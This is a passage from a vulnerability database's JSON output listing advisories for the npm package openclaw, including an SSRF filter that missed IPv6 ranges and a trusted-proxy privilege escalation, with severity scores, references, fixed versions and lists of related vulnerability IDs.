            "summary": "OpenClaw SSRF guard misses four IPv6 special-use ranges\n## Summary\n\nThe SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed.\n\n## Impact\n\nAn attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard.\n\n## Affected Component\n\n`src/shared/net/ip.ts, src/infra/net/ssrf.*`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`).\n\nOpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g86v-f9qv-rh6m",
                    "reference_id": "GHSA-g86v-f9qv-rh6m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g86v-f9qv-rh6m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-g86v-f9qv-rh6m"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aye6-1fwu-nkc5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89033?format=api",
            "vulnerability_id": "VCID-b9w3-w2nq-cqg6",
            "summary": "OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n## Summary\nIncomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n\n## Current Maintainer Triage\n- Normalized severity: high\n- Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00\n\nOpenClaw thanks @north-echo for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41404",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00114",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29702",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00114",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29632",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00114",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29665",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41404"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41404",
                    "reference_id": "CVE-2026-41404",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41404"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g374-mggx-p6xc",
                    "reference_id": "GHSA-g374-mggx-p6xc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g374-mggx-p6xc"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication",
                    "reference_id": "openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41404",
                "GHSA-g374-mggx-p6xc"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b9w3-w2nq-cqg6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91029?format=api",
            "vulnerability_id": "VCID-bg1d-gmxy-wkc6",
